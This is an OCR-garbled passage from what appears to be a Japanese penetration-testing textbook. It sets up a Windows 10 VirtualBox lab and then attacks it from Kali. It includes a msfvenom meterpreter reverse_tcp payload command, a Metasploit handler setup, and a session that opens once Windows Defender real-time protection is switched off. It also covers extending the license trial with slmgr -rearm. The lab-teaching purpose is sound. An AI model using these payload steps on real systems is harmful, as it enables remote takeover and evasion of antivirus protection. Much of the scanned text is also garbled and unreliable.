物理 ハ ー ド ディ スク に ある スト レー ジ 」 の 設定 画面 に な り ま す 。 可変 サイ ズ と 
固定 サイ ズ の どちら か を 選び ます 。 

固定 サイ ズ に する と 、 次 の 画面 で 設定 する ディ スク サイ ズ を すべ て 仮想 マシ ン 
が 占有 し ます 。 ホ スト 側 の ディ スク を 圧迫 し ます が 、 パ フォ ー マ ン ス に は 影響 し 
ませ ん 。 

可変 サイ ズ に する と 、 仮 想 マ シン で 使用 する ディ スク サイ ズ が 少な けれ ば 、 ホ 
スト 側 の ディ スク サイ ズ を 圧迫 し ませ ん 。 次 の 画面 で 設定 する ディ スク サイ ズ を 
最大 値 と する た め 、 そ の 値 に 到達 する まで 自動 的 に 仮想 マシ ン の ディ スク サイ ズ 
が 大 きく な り ま す 。 た だ し 、 一 度 大 きく な っ た ディ スク サイ ズ は 自動 的 に 縮小 さ 
れ ま せん 。 

ホス ト OS 側 の スト レー ジ の 容量 に 余裕 が あれ ば 固定 サイ ズ 、 余裕 が な けれ ば 可 
変 サ イズ に し ます 。 こ こ で は 可変 サイ ズ を 指定 し ます ( 図 4-41)。 


を 宏 想 八 - ド ディ スク の 作成 


物理 ハー ド テ ディス メ の に ある スト レー ジ 


し 1 屋 理 リー ド テ ディ スカ ファ ゴル は 用 | た ぶん だ す 克 な る が かく 
衣 上 1 の 、 お だけ 最大 イズ で 作成 する が 回 写す イ の を 所 いて 


2 ズ の の! の 人 9 
地 を 肖 芋 し よ す 坊 、 スペ ー ス 
度 じ CCEWHHE いま で 


回 補 サイ ズバ ー ド ディ スカ フェ イル は シス エム に よっ て は 『 成 に 寺 言 
が が ガ る が も し れれ は せん 保有 する と 高速 て す 


@ 可 売 9 サイ メ KO) 
〇 固まり す イ 5) 


LN || *wvty | 


図 4.41 「 物 理 ハ ー ド ディ スク に ある スト レー ジ 」 の 設定 





⑦) フ ァイル の 場所 と サイ ズ を 設定 する 
| ファ イル の 場所 と サイ ズ 」 の 設定 画面 に な り ま す 。 デ フォ ルト の 設定 の まま で 
[作成 】 ボタ ン を 押し ます ( 図 4-42)。 
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ぐ を 放 外 敗 - ド ディ スク の 作成 


アイ ル の 場所 と サイ ズ 


馬 L い 暫 下 リ ー ド ディ ス 7 フ ァ ル の 名 前 合 上 細 二 > カス に 力 す る 直 、 
7 コン を ウリ ゅ わし て ファ イル を 作成 する Bl フォ ルル ドー を 肥 沢 


ndws 10(84bi 5 の 


0052 


昌 | 50.90 GB 





図 4.42 「 フ ァイル の 場所 と サイ ズ ]| の 設定 


⑧) 作 成 し た 仮想 マシ ン の 設定 を 確認 する 

VirtualBox の 左 ペ イン に Windows 10 の 仮想 マシ ン の アイ コン が 表示 され ます 。 
アイ コン を 選択 し て 、 右 クリ ッ ク の | 設定 」 で 設定 画面 を 表示 し ます 。 設定 画面 
の 左 ペ イン の 「 ス トレ ー ジ | を 選び ます 。 ス トレ ー ジ デバ イス に Windows 10 
(64bit_ja)vdi が 存在 し 、 そ の 保存 場所 が C:\VM_Guest\VBox\Windows 10 
(64bit_ ja)\Windows 10 (64bit_ ja)vdi" に な っ て いる は ず で す (*26)。 可変 サイ ズ 
の スト レー ジ で あり 、 ま だ 空 の 状態 な の で 、 実 際 の サイ ズ は 2M バ イト と 小さ く 
な っ て いま す ( 図 4.43)。 


*26 : 23 で デフ ォ ル ト の 仮想 マシ ン フ ォ ル ダー を "C:\VM_Guest\VBox" に 指定 し た 場合 は こう 
な り ま す 。 
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《 紀 Wodows 10 [Gbit 記 ・ 翌 富 


語 局 ほ am ョ 。 
馬 世 hp っ =sarw 。 上 n に NZ が o) RT 本 R 
本 Mgowc 16(54bt ay し sssai-ssns dnal 還 





ホッ ト プ 50TTIED) 
恒 絞 一 
イス 計 誠 ) 価 守 (vtG 
人 央 0 サリ イズ HOUDGB 
実際 7D け イズ 200 MB 
詳 t 可 天 りえ 0 スト ルー 
坦 所 CWU CG。cstevBzwUindss 5 jamWirdcns (6 も を Al edi 
す D 四 て mm 9(04bW js) 
還 計 mn 味 一 


FE ユー サー イン テー フェ ー ス 





図 4.443 スト レー ジ の 設定 内 容 


類 仮想 マシ ン に Windows 10 を イン スト ー ル する 
空 の 仮想 マシ ン が で きた の で 、 こ れ に Windows 10 を イン スト ー ル し ます 。 


①Windows 10 の 仮想 マシ ン を 起動 する 

作成 し た Windows 10 の 仮想 マシ ン の アイ コン を ダブ ルク リッ ク し て 起動 し ま 
す ("27)。 | 起動 ハー ド デ ィ スク の 選択 | 画面 に て 、isSo フ ァイル (ここ で は 
"Windows10jso') を 指定 し て 、[ 起 動 ] ボタ ン を 押し ます 。 


②)Windows 10 の 種類 を 選択 する 

仮想 マシ ン が 再起 動き され 、iso フ ァイル か ら ブ プ ブート し ます 。 す る と 、「Windows 
Boot Manager」 が 起動 し 、64bit / 32bii の どちら か を 間 か れ ま す 。 こ こ で は 
| Windows 10 Setup (64-bit)」 を 選択 し て 、[Enter] キー で 進み ます ( 図 4-44) 。 


*27 : 仮想 マシ ン の 起動 前 に 、 仮 想 CD-ROM ドラ イプ に ISO フ ァイル を 設定 し て お いて も 構い ま 
せん 。 
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arls VM rts kox 


1ndows Boot Manaqer 


Choose an Operat]nq SYStemm tO start 上 。 Or DFeSS TAB toO select & tool: 


(Use the arrow keys to high11qght your cho1ce.。 then 


indows 10 Setup (64-b1) > 


W1nQOwS 10 SetMUD (32-D1 て ) 


TO Spec1fy an advanced opt1on Tor th15 ChoO1Ce。 DFe55 F8. 


Too ls: 


W1PhQOwS MemmoFY D1aqhOS て 1 て 


ENTER=ChQOSe ESC=Canice 1 
回 の ぎみ ョ 困 宮 回 Cd・Ak 





4-44 Windows Boot Manager 


3 イン スト ー ル の 設定 を する 
Windows 10 の イン スト ー ラ ー が 起動 し ます 。 次 の よう に 指定 し て 、| 次 へ | ボ 


ァ シン 沈 聞 1 主 二 7 罰 4 4 
タン を 押し ます ( 図 4.45) 


s イ ンス トー ル す る 言語 : 日 本 語 (日 本 ) 
* 時 刻 と 通貨 の 形式 : 日 本 語 (日 本 ) 
ュ - < + コ ココ 2 - エー 
キ ー ホー ド 寺 れれ を 人 / リ 万 子 \ ・ IMicrosott IME 
・ キ ー ボ ー ド の 種類 : 日 本 語 キ ー ボ ー ド (106/109 キ ー) ("28) 
w が 本 る 1 ド } が ト ん 使 用 ト < [て ゴ 白 2) 環境 に へ 】 ] ミ ささ 
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3owi 10(Mbt a) | 行 下 | - COwacls VWM Virta 風 ox 


抜 可 マ シソ 示 


= Windows セト アッ プ 





回 ウル ケ 。 gg 本 届 1 相 Otrl・ Ak 





図 4.45 Windows セ ッ ト ア ッ プ 


4 プロ タク トキ ー の 有無 を 選択 する 


も ヽ ャ | 3. vw 3 1 ず ・ か ヽ le ン 1 ニー ーーT 放 一 本 者 
* す ぐ イ ンス トー ル 」 ボタ ン を 押す と 、| Windows の ライ セン ス 認 証 」 画面 が 


ーー ー* ま 。 。 で テー rm デメ に い -・ _ pg ー 。 静 隊 + 目 、 上 ーー ーー 王 ユ | FE に デュ 、 
家 示さ れ ま す 。 ブ プロ ダク トキ ー を 持っ て いる 場合 は ここ で 入力 し ます 。 持っ て い 


5 エディ ショ ン を 選択 する 


1 っ * 1 iio "チア 。 、 ま 。 0 で 人 あ 20 メデ < に 過 # た 、 中 / 生 し * 9 ふう 
イ ー ど 人 ル 膝 げ っ | 0 レ っ 「 及 1 デバ が 人 > で は と / 害 当 S か oe た 【 _ レ 家 ./ ト aw ナ ] プ 、_ 


ら 、| Windows 10 Pro」 を 選択 し ます ( 図 4-46)。Pro が 選択 肢 の 中 で 最も 高 


ヽ 


で ある た だ ため です 。 さら に 、Microsoft の ソフ トウ ェ ア ラ イセ ンス 条項 引 意 しま 


em ュ 上 デ ューm コ すず 。 ー ギ こし 本 
3 デデデ ェ テッ クル て + 儲 3 
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の ee om ッ フ 


イス トー ル す る オバ ルー ティ ン リ シス テト も を 革 ん で くだ さ し 4S) 


ゴ オペ レー ティ ング ステ ム ドー キモ 東和 日 
NII は 」 
Im9/ 当 

Wndmrr 10 Eucwim 709/30 








図 4.46 エディ ショ ン の 選択 


6⑥ イン スト ー ル の 種類 を 選択 する 

イン スト ー ル の 種類 で は 、「 カ スタ ム : Windows の み を イン スト ー ル する 」 を 選 
択 し ます 。Windows10 を イン スト ー ル する 場所 を 聞か れ 、 デ フォ ルト で は 「 ド ラ 
イブ 0 の 割り 当て られ て いな い 領 域 」 (仮想 マシ ン で 確保 し た ディ スク 領域 ) が 指 
定 さ れ て いる の で 、 そ の まま [次 へ 」 ボタ ン を 押し ます 。 


⑦ 基 本 情報 や アカ ウン ト の 設定 を する 

Windows の イン スト ー ル が 終わ る まで 、 し ば らく 待ち ます 。 イ ンス トー ル が 完 
了 す る と 、 自動 的 に 再起 動 し ます 。"Press any key to boot from CD.…′ と 表示 され 
ます が ("29)、 何 も 操作 せ ず に 待ち ます 。 後 は 、 指 示 に し た が い 基 本 情報 や アカ ウ 
ント を 設定 し ます ( 図 4-47)。 実験 用 な の で 、 下 記 の よう に 構成 は シン プル に し ます 。 


・ 認証 画面 で は 、「 オ フラ イン アカ ウン ト 」 を 押し て 、 ア カウ ント を 作成 する 。 
Microsoff アカ ウン ト で サイ ン イ ン す る と 、 他 の Windows 10 の 端末 た と ファ イル 
が 同期 し て し まう 。 これ は 実験 用 の Windows 10 な の で 独立 性 を 優先 し 、 
Microsofft アカ ウン ト は 使用 し な い 。 


*29 : BIOS で CD / DVD ドラ イブ が 優先 の プー ト に な っ て お り 、 起 動 可 能 な メデ ィ ア が 挿入 され 
て いる と き 、 こ の メッ セー ジ が 表示 され ます 。 キ ー を 埋 す と 、 メ ディ ア か ら 起 動 し よう と 試み ま 
ke 
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s* | デバ イス の プラ イバシー 設定 の 選択 」 画面 で は 、 す べ て を 無効 に する 


俊 は 、 デ スク トッ プ 画 面 が 出る まで 指示 に し た が いま す 。 


ぬ Windoms (bt ja [ 宇 中 | - rec lc VM "walBos 


ギド チコ ー つ 
入力 上 イフ | 陳 


Welcome to the best Windows ever 


Check out the new features Delow to see what makes it qreat 


SynC VOu「 DrOwWsih ロ 『GvODTItES, 


癌 bookrmiaiks 


に 


Save snaCe wth FilEs ロ n-Demand 


LEAFRN MDORHE > 


に ( 〇 OO ザウ コ m 宮 中 @ 可 Ci・Ah 





図 4.47 イン スト ー ル 直後 の デス クト ッ プ 画面 


8 仮想 ドラ イフ か ら デ ィ ス ク を 除去 する 
Windows 10 を いっ た だ ん 終了 し ます 。 仮想 CD-ROM に isSo フ ァイル が セッ ト さ れ 
だ まま に な っ て いる の で 、 仮 想 マ シン の 設定 画面 に て 解除 し ます ( 図 4.48) 
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記 て 2 フ 


図 4.48 仮想 ドラ イブ か ら デ ィ ス ク を 除去 


⑨)Windows 10 の 仮想 マシ ン に ログ イン する 
仮想 マシ ン を 開始 し 、 認 証 画 面 に て オフ ライ ン ア カウ ント で ログ イン し て 、 
Windows 10 の デス クト ッ プ 画面 が 表示 され れ ぱ ば 成功 で す 。 


起動 時 の 「0x0000560」 エラ ー を 修正 する 


VirtualBox に て Windows 10 の 仮想 マシ ン を 起動 する と 、 エ ラー コー ド 
[Ox0000260] が 表示 され る こと が あり ます ( 図 4449)。 メ ッ セ ー ジ に は 、 メ モリ ー 
に 割り 当て られ て いる 容量 が 4G バ イト より 少な いと な っ て いま す が 、VirtualBox 
で 4G バ イト より 大 きく し て も 改善 し ませ ん 。 解決 方 法 は 、 プ ロモ セッ サー の 設定 で 
PAE/NX を 有効 に する こと で す 。 こ の と き 、 メ モリ ー は 4G バ イト 以下 で も 問題 あ 
り ま せん 。 
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図 4.49 [Ox0000260] エラ ー 画 面 


上 記 の 設定 を 適用 すれ ば エラ ー 画 面 が 出 な く な り ま す が 、 今 度 は ロゴ の 画面 か 
ら 動 か な いこ と が あり ます 【 図 450)。 





図 44.50 ロゴ の 画面 で 止ま っ た 状態 


この 現象 が 発生 し た ら 、 仮 想 マ シン の 設定 の | シス テム 」 で 、 次 の 設定 を 追加 
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で 行い ます 。 


[マザー ボー ド 」 タブ プ の 「 拡 張 機能 ]」 の [LO APIC を 有効 化 ] に チェ ッ ク を 人 入 
れる 。 

*「 ア クセ ラレー ショ ン 」 タプ の 「 仮想 化 支援 機能 ] の 「VT-x/AMD-V を 有効 化 」 
と 「 ネ ステ ッ ド ペー ジン グ を 有効 化 ] の 両方 に チェ ッ ク を 入れ る 。 


光 Windows 10 の 初期 設定 
Windows 10 を イン スト ー ル し 終え た ら 、 各 種 設定 を 適用 し ます 。 


(① ラ イセ ンス の 獲 予 期間 を 延長 する 

Windows の ライ セン ス の 猫 予 期間 は 、 イ ンス トー ル し て か ら 30 日 間 で す 。 ラ イ 
セン ス 認 証 を せ ず に PC を 使い 続け る と 、Windows 10 で は 次 の よう な 機能 制限 を 
受け ます C30)。 


* 画面 右 下 に 「Windows の ライ セン ス 認 証 を 行っ て くだ さい | と いう メッ セー ジ 
が 表示 され る 。 

・ OS の 更新 や アッ プ デ ー ト の 一 部 が 受け られ な く な る 。 

・ パ ー ソ ナル 設定 ( 例 : 壁紙 、 ロ ッ ク 画 面 、 チ テー マ な ど ) を 変更 で き な く な る 。 


以前 の Windows で は 制限 を 受け る と 、 ラ イセ ンス 認証 し か で き な く な り ま し た 
が 、Windows 10 で は 非常 に ゆる く な っ た と いえ ます 。 

猫 予 期間 は 30 日 間 に な っ て いま す が 、slmgr -dlv コ マン ド を 実行 する と 「 残 り 
の Windows 猫 予期 限 リ モット 可能 回 数 ] が 1.001 回 に な っ て いま す 。 つ まり 、 仕 様 
と し て は 、 ほ ほぼ 無制限 に 試用 期間 を 延長 で きる こと を 意味 し ます 。 延長 する 場合 
に は 、 管 理 者 と し て コマ ンド プロ ンプ ト を 起動 し て 、slmgr -rearm コ マン ド を 実 
行 し ます ( 図 4-51)。 


*30 : Tweak 系 の ツー ル を 使え ば 、 回 避 し て パー ソナ ル 設 定 で きる こと が あり ます 。 
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図 4.51 slmgr dlv コマ ンド の 結果 


過去 の バー ジョ ン で は 、 延 長 す る こと で 機能 制限 が 解除 され る バグ が あり まし 
た 。 し か し 、 今 で は 延長 し て も 機能 制限 が か か り ま す 。 ハ ッ キ ング の 実験 で は 支 
障 は 少な いと 思い ます (支障 が 出れ ば イン スト ー ル し 志 せ ば よい )。 

な お 、 継 続 し て 使用 する 場合 に は ライ セン ス を 用 意 し て くだ さい 。 Microsoft か 
ら イ ンタ ーネット 経由 で 購入 も で きま す 。 ダ ウン ロー ド 版 で あれ ば iso フ ァイル を 
入手 で きる の で 、 そ の まま 仮想 マシ ン の イン スト ー ル に 利用 で きま す 。 ま た 、 量 
販 店 で あれ ば も う 少 し 安く 購入 で き 、 イ ンス トー ル DVD も 付属 し ます 。 


②)Guest Additions を イン スト ー ル する 

Guest Addiiions を イン スト ー ル し て 、 ホ スト OS と ファ イル の や り 取 り が で き 
る よう に し ます 。 

仮想 マシ ン の メニ ュー の 「 デ バイ ス 」 > [Guest Additions CD イメ ー ジ の 挿入 」 
を 選び ます 。 AutoPlay の 通知 を 押し て 、 こ の ディ スク に 対す る 操作 と し て 
「 VBoxWindowAdditions.exe の 実行 ] を 選び ます 。 後 は Windows 7 の と き と 同 様 
で 、 デ フォ ルト の まま イン スト ー ル を 続け ます 。 イ ンス トー ル を 終え る と 、 再 起 
動 を うな が され ます 。 
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3 Windows Update を 無効 に する 
必要 が あれ ば Windows Update 機 能 を 無効 に し ます (*31)。 


④Ping の 応答 を 返す よう に 設定 する 

Windows 10 は Windows 7 と 同様 に Ping 応 答 を 返さ な いよ うに な っ て いま す 。 
Windows 7 の 初期 設定 で 説明 し た 手順 の よう に し て 解除 で きま す 。「 コ ント ロー ル 
パネ ル 」 > 「 シ ステ ム と セキ ュ リ ティ 」 > 「Windows Defender ファ イア ウォ ー ル 」 

>「 詳 細 設 定 ] を 選ぶ と 、 Windows フ ァ イ ア ウォ ー ル の 設定 画面 が 表示 され ます 。 
「 受 信 の 規則 ] >「 フ ァイル と プリ ンタ ー の 共有 (エコー 要求 - ICMPy4 受 信 )」 の 
ドメイン と プラ イベ ー ト を 複数 選択 し て 、 右 クリ ッ ク で 「 規 則 の 有効 化 ] を 選び 
ます 32)。 


⑤ 仮 想 マ シン の 設定 を する 
Windows 10 を 終了 し て 、 仮 想 マ シン の 設定 画面 か ら 、 次 の よう に 設定 し ます 。 


* | 一 般 」 > [高度] タプ の |「 ク リッ プ ボ ー ド の 共有 」 と | ドラ ッ グ 称 ド ロッ プ 」 
を 「 双 方 向 ] に する 。 

が 区 テム | | トマ ザー ポ ボード) タゲ を 天 まる 。 ここ チッ プ モ ッ キ と し 1P 
IX3] か IICH9] の どちら か を 選べ る 。 デ フォ ルト で は 前 者 が 選ば れ て いる 
が 、Windows 10 は 最新 の チッ プ セ ッ ト の 方 が よい と いわ れ て いる の で [ICH9」 
に 変更 する 。 拡張 機能 に て 、|L/O APIC を 有効 化 】 の チェ ッ ク が 入っ て いる こ 
と を 確認 する 。 

[シス テム | > 「 プ ロ セ ッ サ ー」| タプ ブ を 選択 し 、Windows 10 が 使用 で きる プロ 
セッ サー 数 の 上 限 値 を 上 げ る 。 緑色 の ゲー ジ の 最大 値 ま で 矢印 を ずら す 。 

| ディ スプ レイ 」 > [スク リー ン 」 タプ を 選択 する 。 こ こ で 描画 性 能 を 設定 で き 
る 。 ビデ オメ モリ ー を 最大 値 ま で 上 げ る 。 さら に 、 ア クセ ラレー ショ ン に て |3D 
アク セラ レー ショ ン を 有効 化 ] と 「2D ビデ オア クセ ラレー ショ ン を 有効 化 ] に 


*31 : 第 3 章 「3.9 Windows Update を 管理 する 」 内 の | Windows Update に 対す る 方 針 ] を 参考 に 
し て 、Windows Update 機 能 を 無効 に し ます 。 


32 : 1 つ ず つ 選 ん で 設定 を 適用 し て も 構い ませ ん 。 
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チェ ッ ク を 信 れ て 有効 化す る (33)。 
| ネ ットワーク 」 で 、 仮 想 LAN ア ダ プ ター を 次 の よう に 設定 し ます 。 


アダ プター1 
| | 割り当て:NAT 


だ が ププ ゲージ 


割り 当て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 





'⑥ IP アド レス を 確認 する 
Windows 10 を 起動 し て 、IP ア ドレ ス を 確認 し ます 。 コ マン ド プ ロン プ ト を 起動 
し て 、ipconfig コマ ンド を 実行 し ます 。 NAT の IP アド レス と ホス ト オ ン リー ネッ 
トワ ー ク の 動 的 IP アド レス が 割り 当て られ て いる こと を 確認 し ます 。 
C:\Users\1pDus1iron>1DCOnf1g 


Mindows TP 構成 


イー サ ネ ッ ト アダ プター イー サ ネ ッ ト : 


接続 固有 の DNS サフ ィ ッ クス . . . . .: flets-east.]p 

リン クロ ー カ ル IrPv6 アド レス . . . . .: fe89: : 5123 : 1996 : 4897 : 8a75%4 
8 ・ 19.9.2.15 
リプ ま ポッド ト ダグ 。 。 。 は で 2 こみ を (SS 5 255 か 95。@ 

デブ オド ゲー ドウ 生計 。。。。。。。 ・ 19.9.2.2 


イー サ ネ ッ ト アダ プター イー サ ネ ッ ト 2: 


接続 固有 の DNS サフ ィ ッ クス . . . . .: 
リン クロ ー カ ル IrIPv6 アド レス . . . . .: fe89: :4559:b5d8 : c914 :f5d%8 
ee の な 94 


ホス ト オ ン リー ネッ トワ ー ク の 動 的 IrP ア ドレ ス 。 





*33 : シス テム が 不安 定 に な る 場合 、 こ の 設定 は 不要 で す 。 
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ンー こさ マー ・ 255.255.255.9 
デア ォ ル ト ゲー トウ ヴェイ 。 。 。 。 | 。 85 


C:\UserS\1DuS1Fon> 
ヵ NAT の 疎通 を 確認 する 
NAT の 疎通 を 確認 し ます 。 


C:\Users\1Dus1ron>D1ng 192.168.1.1 ルー ター と の 疎通 確認 。 
C:\Users\1pus1Fron>D1ng 8.8.8.8 イン ター ネッ ト と の 疎通 確認 。 





8⑧). ホ スト オン リー ネッ トワ ー ク の 疎通 を 確認 する 
ホス ト オ ン リー ネッ トワ ー ク の 疎通 を 確認 し ます 。Windows 10 か ら ホ スト OS 
と Kai に アク セス で きる こと を 確認 し ます 。 


C:\Users\1Dpusiron>D1ng 19.9.9.1 ホス ト os と の 践 通 確認 。 


C:\Users\1pus1ron>D1ing 19.9.9.2 kali と の 残 通 確認 。 


Kali か ら Windows 10 に アク セス で きる こと を 確認 し ます 。 





Foot 仙 ka11:<# Ding 19.9.9.194 Mindows 19 の 動 的 rp アド レス を 指定 する 。 


以上 で 初期 設定 は 完了 で す 。 仮想 マシ ン の 設定 画面 の 「 ス トレ ー ジ 」 を 表示 す 
る と 、vdi フ ァイル は 12.14G バ イト に 増え て いま す 。 ディスク が 可変 に な っ て いる 
の で 、 イ ンス トー ル の 結果 で サイ ズ が 増え た わけ で す 。 


消 Windows 10 を Metasploit で 攻撃 する 

基本 的 な 攻撃 の 流れ は Windows 7 の 場合 と 同様 で す が 、Windows 10 は セキ ュ 
リティ が 向上 し て いま す 。 そ こ で 、 こ こ で は Windows 7 で 通用 し た 攻撃 が うま く 
いか な いこ と を 確認 し ます 。 こ の 実験 に お ける 環境 は 、 次 の 通り で す 。 
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Kali (攻撃 端末 ) 
アダ プター1 (必須 ) 
者 り 当 て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.2 ( 静 的 ) 


| アダ プター2 (任意) プター2 | アダ プター2 (任意) 


割り 当て : NAT 
IP アド レス : 10.0.3.15 ーー ニー 徴 EE 


Windows 10 (ター ゲッ |Windows 10 (ター ゲッ ト 端 末 ) ウィ 


| | 割り 当て :NAT 
アダ プター2 


者 り 当て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.104 ( 動 的 ) 





① リ バー スシ ェ ル の ペイ ロー ド を 作成 する 

Kali 側 で msfvenom コマ ンド を 用 いて 、 リ バー スシ ェ ル の ペイ ロー ド を 作成 し 
ます 。 た だ し 、 タ ー ゲ ッ ト 端 末 は 64bit で ある こと を 考慮 し て 、64bit 向 け の ペイ 
ロー ド を 作成 し ます C34)。 


root@ka11:<# msfvenom -p windows/x64/meterpreter/reverse tcp 。」 
LHOST=19.9.9.2 -† exe -o /root/Desktop/ evi12 . exe 

[ - ] No platform was selected, choosing 

Msf : :Module : : Platform : :M1ndows from the payl1oad 

[| - ] No arch selected, selectng arch: x86 from the payload 

No encoder or badchars specified, outputtng raw payload 
Payload size: 341 bytes 

Final size of exe ile: 73892 bytes 

Saved as: /root/Desktop/evi12 . exe 


*34 : 64bit の Windows に 対し て 、32bit の ペイ ロー ド (windows/meterpreter/reverse_tcp ) を 用 
いて も Meterpreter セ ッ シ ョ ン を 確立 で きま す 。64bit の Windows で 32bit 向け の アプ リ が 動く こ 
と か ら も わか り ま す 。 
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2) ペ ベイ ロー ド を 外部 か ら ア クセ ス で きる ディ レク トリ に 移動 する 
ペイ ロー ド で ある evil2exe ファ イル を 外部 か ら ア クセ ス で きる ディ レク トリ 


に 移動 し ます 。 


Foot 個 ka11:< 攻 CD /root/Desktop/evi12 .exe /var/www/html/share/ 


POOt 同 Kal1:< serV1cCe apache2 restart 


3 Windows の フラ ウザ か ら ベ イロ ー ド に アク セス する 
Windows 10 側 で プラ ウザ を 起動 し 、http://100.0.2/share に アク セス し て 、 
evil2exe が 存在 する こと を 確認 し ます 。 こ こま で は Windows 7 の と き と 同 じ 流 


ーーー 


れ で す 。 


4④ ベイ ロー ド を タダ ウン ロー ド す る 

Windows 10 で evil2exe ファ イル を ダウ ン ロ ー ド し よう と し て も 、| Windows 
Defender Antivirus ウ イル ス 対 策 に より 脅威 が 検出 され まし た 」 と いう 通知 が 表 
示さ れ ま す ( 図 4.52)。 これ は Windows Defender Antiviruns に ウイ ルス と し て 検知 


され た た だ ため で す 。 


商 


二 
に っ 1 る jiwcr gl ha 


*。 〈() 仙 
Indexs of /share 


N sm ane spcli 后 aqd Bsza Nescrngthom 


テー フイ ルス と 骨 手 の 前 上 
ぐ で Vce (だ 1 KH に つい て 行う 振 作 を 
ーー つて て 更 つ か っ た 月 の 数 
妨 散 - 1D00.2 





4.52 Windows Defender Antivirus に ウイ ルス を 楼 知 され た 
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プラ ウザ の 下 の 【[ 保 存 ]」 ボタ ン を 押し て 強制 的 に 保存 し て み ま す 。 ダウ ン ロ ー 
ド が 終了 する の で 、 [フォ ル ダ ー を 開く ] ボタ ン を 押し ます 。「 ダ ウン ロー ド 」 フォ 
ル ダ ー が 開き 、 evil2.exe ファ イル が 存在 し て いま す 。7K バ イト と 表示 され て い 
ます C*35)。 

次 に 、「Windows Defender セ キュリ ティ セン ター」 で 「 リ アル タイ ム 保 護 ] を 
オフ に し て か ら 、evil2exe を ダウ ン ロ ー ド し ます 。 す る と 、 ウ イル ス 検 知 の 通知 
は 表示 され ず 、"evil2 (1)exe" と いう ファ イル 名 で 保存 され ます 。 こ れ も 7K バ イト 
と 表示 され て いま す 。 

ここ で 、 同 じ フ ァイル を 2 回 ダグ ダウンロー ド し て いる の は 、 挙動 の 人 違い を 確認 する 
だ た めで す 。 


* evil2exe… リ アル タイ ム 保 護 あ り の と き に 強制 的 に 保存 し た 。 
* eVil2 (1)exe… リ アル タイ ム 保 護 な し で 保存 し た 。 


5 リバ ー ス シェ ル を 待ち 受け る 

Kali 側 で リバー スシ ェ ル を 待ち 受け ます 。 こ の と き 、 ハ ンド ラー モジ ュー ル に 
は 、 ペ イロ ー ド と し て "windows/x64/meterpreter/reverse_tcp' を 指定 し ます 。 
ハン ドラ ー を exploit コマ ンド で 実行 する 際 に は 、j オ プシ ョ ン と -z オ プシ ョ ン を 
指定 し ます 。 


-]:・ ジ ョ ブ と し て モジ ュー ル を 実行 する 。 
-z : モジ ュー ル の 実行 が 成功 し て Meterpreter セ ッ シ ョ ン が 確立 し て も 、 
Meterpreter プ ロン プ ト に な ら ず msf プ ロン プ ト の まま に する 
(セッ ショ ン を バッ ク グ ラウ ンド に する ) 。 


rootQKa11:<# msfconso1e 
( 略 ) 
msf > use exploit/mu1ti/handler 
msf exploit(multi/handler) > set pay1oad windows/x64/meterpreter/.」 


35: シス テム に よっ て は 、 ウ イル ス 検 知 き れ た ファ イル を 強制 的 に 保存 し た 場合 、 フ ァイル が 0 
バイ ト に な る こと も あり ます 。 今後 、 Windows の 仕様 が 変わ っ た 場合 、 ウ イル ス 検 知 き され た ファ 
イル を 保存 で き な く な る 可能 性 も あり ます 。 
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らら SmrrrrorrmT ーー テー ' 
ー 生 | は ウス = ピア ルッ は とく - 





⑥: ペ イロ ー ド を 実行 する 

| ダウン ロード 時 の リア ル タ イ ム 保 護 の 有無 ] と | 実行 時 の リア ル タ イ ム 保 護 の 
有無 」 の 組み 合わ せ を 考え る と 4 パタ ー ン が あり ます ( 表 4.8)。 こ れ ら を 試し て み 
る と 、 次 の よう な 結果 に な り ま し た 。 


表 4-8 リア ル タ イ ム 保 護 の 有無 に よる 動作 の 違い 


| レー | ヶ -22 





・ ケ ー ス 1 :「 こ の アプ リ は お 使い の PC で は 実行 で きま せん 」 と いう ダイ アロ グ が 
表示 され る ( 図 4-53)。 

* ケー ス 2:「 こ の アプ リ は お 使い の PC で は 実行 で きま せん 」 と いう ダイ アロ グ が 
表示 され る (ケー ス 1 と 同じ )。 

s* ケ ー ス 3 :|「 フ ァイル に ウイ ルス また は 望ま し く な い 可 能 性 の ある ソフ トウ ェ ア 
が 含ま れ て いる た め 、 探 作 は 正常 に 完了 し ませ ん で し た 」 と いう エラ ー ダ イア 
ログ が 表示 され る ( 図 454)。 さ ら に 、 検 疫 さ れ て し まう 。 

* ケー ス 4: 初 回 実行 時 は SmartScreen の 克 告 画面 が 表示 され る 。 強制 的 に 実行 す 
る と Meterpreter セ モッ ショ ン が 確立 する ( 図 4.55) 。 攻 撃 成功 。 
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この アブ リ は お 使い の PC で は 実行 で きま せん 


この PC で 使用 で きる 了 ナ ブリ の ルー ジョ ソ に つい て は 、 ソフ トリ ュ ア 発行 元 に 確認 し て くだ さい 





図 4.53 ケー ス 1 と 2 の ダイ アロ グ 


ご YJzersYiPuzronYDornlowizwevis |1).exe 


3 CWUsersYipuaronYDownloads 和 it (ve 


ファ イル に ウイ ルス ま よ は 記さ し く な い 相 舌 性 の ある リフ トウ ェ ア ザ が 合 さ まれ て いる た ぬ 、 公 作 は 記 舎 に 完了 し ぶせ 


ん で し に 。 





図 4454 ケー ス 3 の エラ ー ダ イア ログ 


① ウ イル ス と し て 検知 され た わけ で は 
あり ませ ん が 、 こ の 警告 画面 が 出 ます 。 





Windows に よっ て PC が 保護 され まし Windows に よっ て PC が 保護 され まし 


(② 詳 細 情 報 を 押し ます 。 





図 4.55 SmartScreen の 殴 告 


ここ で は 、 リ アル タイ ム 保 護 を 無効 に し た まま 、'evil2 (1)exe ファ イル を ダ プ 
ルク リッ ク し て 実行 し ます 。 す る と 、Kali 側 の 表示 に より 、Meterpreter セッ ショ 
ン が 確立 し た こと が わか り ま す 。 
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| Meterpreter セ ッ ン ション が 確立 し た メッ セー シ が 表示 され る 。 | 





な お 、 これ は msf プ ロン プ ト 中 に 、 セ モ セッション の 確立 を 知ら せる メッ セー ジ が 割 
り 込 ん で いる だ け で あり 、 こ れ を 入力 し た わけ で は あり ませ ん 。 [Enter] キー を 
押し て 見 や すく し ます 。 msf プ ロン プ ト が 返っ た ら 、sessions コマ ンド で 、 セ モッ 
ショ ン 一 覧 を 表示 し ます 。 





⑦ 実 験 用 ファ イル を 作成 する 

Windows 10 に て 、 実 験 用 と し て Downloads フォ ル ダ ー に "passwords.txt' フ ァ 
イル を 作成 し て お きま す 。 

